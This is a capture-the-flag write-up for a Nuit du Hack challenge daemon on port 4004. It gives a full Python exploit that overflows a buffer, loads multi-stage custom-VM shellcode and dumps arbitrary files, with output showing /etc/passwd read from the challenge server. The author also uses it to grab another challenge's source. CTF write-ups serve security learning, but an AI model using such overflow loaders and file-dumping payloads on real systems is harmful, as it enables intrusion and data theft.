The daemon on port 4004 is a fairly simple daemon that check for a password (hard-coded in the binary) and just says “You are authenticated”.
What’s interesting is that this daemon is running on the same server that many other challenges so we used it to fetch files and solve the URL Shortener challenge more easily by retrieving its Python source.
We have limited space for the shellcode, only 100 bytes. While you can totally read files in a 100 bytes shellcode if you don’t care about error checking, I wanted something cleaner (that’s the excuse for spending time to do a multi-stage exploit loader)
This exploit will:
– overflow the buffer (size is 0x100)
– Inject stage 1 loader
– Read Stage 2 from stdin
– Execute Stage 2
– Read filename to dump from stdin
– Open file with error checking
– Dump the file using a read/write loop, so you can dump file bigger than the memory
– Exit
import socket
import sys
import time
from struct import pack
if len(sys.argv) != 4:
print '\nUsage:\t./sciteek4004.py [host] [port] [filename]'
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(65536)
print 'Received', repr(data)
''' Stage 2 '''
''' Read filename from stdin, output to stdout '''
sc = "\x04\x02\x01\x00\x00" # movl r1, 0x0
sc += "\x04\x02\x00\x03\x00" # movl r0, 0x3
sc += "\x04\x02\x02\x94\x7a" # movl r2, 0x7b94
sc += "\x04\x02\x03\x32\x00" # movl r3, 0x32
sc += "\x30" # syscall (read)
sc += "\x04\x02\x00\x02\x00" # movl r0, 0x2
sc += "\x04\x02\x01\x94\x7a" # movl r1, 0x7b94
sc += "\x04\x02\x02\x00\x00" # movl r2, 0x0
sc += "\x04\x00\x03\x02" # movl r3, r2
sc += "\x30" # syscall (open)
sc += "\x18\x02\x00\xff\xff" # cmpl r0, 0xffff
sc += "\x10\x39\x00" # jz +57
sc += "\x04\x00\x07\x00" # mov r7, r0
sc += "\x04\x00\x01\x00" # movl r1, r0
sc += "\x04\x02\x00\x03\x00" # movl r0, 0x3
sc += "\x04\x02\x02\x00\x10" # movl r2, 0x1000
sc += "\x04\x02\x03\xff\x00" # movl r3, 0x32
sc += "\x30" # syscall (read)
sc += "\x18\x01\x00\x00" # cmpl r0, 0x0
sc += "\x10\x1a\x00" # jz +26
sc += "\x04\x00\x03\x00" # movl r3, r0
sc += "\x04\x02\x00\x04\x00" # movl r0, 0x4
sc += "\x04\x02\x01\x01\x00" # movl r1, 0x1
sc += "\x04\x02\x02\x00\x10" # movl r2, 0x1000
sc += "\x30" # syscall (write)
sc += "\x04\x00\x00\x07" # mov r0, r7
sc += "\x16\xc7" # jmps -47
sc += "\x04\x02\x00\x01\x00" # movl r0, 0x1
sc += "\x30" # syscall (exit)
''' Stage 1 Loader '''
loader = "\x04\x02\x01\x00\x00" # movl r1, 0x0
loader += "\x04\x02\x00\x03\x00" # movl r0, 0x3
loader += "\x04\x02\x02\x00\x60" # movl r2, 0x6000
loader += "\x04\x02\x03" # movl r3, 0x32
loader += pack("<H", len(sc)) # -continued
loader += "\x30" # syscall (read)
loader += "\x04\x02\x00\x00\x60" # movl r2, 0x6000
loader += "\x19\x03\x00" # call *r0
if len(loader) > 100:
print "\nShellcode too long: ", len(loader), "\n"
sys.exit(1)
print "Shellcode size: ", len(loader), "\n"
payload = '\x02' * (100 - len(loader)) # Nopsled
print "Nopsled size: ", len(payload), "\n"
payload += loader
payload += "\x94\x7f" # To Nopsled
print "Payload size: ", len(payload), "\n"
# Send Stage 1 Loader
s.send('%s' %payload);
time.sleep(2)
# Send Stage 2
s.send('%s' %sc);
time.sleep(2)
# Send filename to download
s.send('%s' %sys.argv[3] + "\x00\n");
while 1:
line = s.recv(65536)
if not line:
break
print line
s.close()
Result:
$ python sciteek4004.py sciteek.nuitduhack.com 4004 “/etc/passwd”
Received ‘Password (required): ‘
Shellcode size: 29Nopsled size: 71
Payload size: 102
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spo
ol/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
